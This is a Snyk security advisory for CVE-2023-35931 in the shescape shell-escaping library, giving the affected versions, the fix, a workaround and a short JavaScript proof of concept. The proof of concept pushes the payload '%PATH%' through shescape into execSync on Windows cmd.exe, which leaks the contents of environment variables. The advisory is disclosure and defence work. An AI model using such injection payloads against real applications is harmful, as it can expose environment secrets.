Information Exposure Affecting shescape package, versions <1.7.1
Snyk CVSS
Attack Complexity
Low
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.05% (19th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JS-SHESCAPE-5734237
- published 23 Jun 2023
- disclosed 22 Jun 2023
- credit Unknown
Introduced: 22 Jun 2023
CVE-2023-35931 Open this link in a new tabHow to fix?
Upgrade shescape to version 1.7.1 or higher.
Overview
shescape is a simple shell escape library
Affected versions of this package are vulnerable to Information Exposure such that an attacker may be able to get read-only access to environment variables.
Note:
This impact users of Shescape:
- On Windows using the Windows Command Prompt (i.e.
cmd.exe), and - Using
quote/quoteAllorescape/escapeAllwith theinterpolationoption set totrue.
Workaround
Users who are unable to upgrade to the fixed version can remove all instances of % from user input, either before or after using Shescape.
PoC
import * as cp from "node:child_process";
import * as shescape from "shescape";
// 1. Prerequisites
const options = {
shell: "cmd.exe",
// Or
shell: undefined, // Only if the default shell is CMD
// And
interpolation: true, // Only applies to `escape` and `escapeAll` usage
}
// 2. Attack (one of many)
const payload = "%PATH%";
// 3. Usage
let escapedPayload;
escapedPayload = shescape.quote(payload, options);
// Or
escapedPayload = shescape.quoteAll([payload], options);
// Or
escapedPayload = shescape.escape(payload, options);
// Or
escapedPayload = shescape.escapeAll([payload], options);
// And (example)
const result = cp.execSync(`echo Hello ${escapedPayload}`, options);
// 4. Impact
console.log(result.toString());
// Outputs "Hello" followed by the contents of the PATH environment variable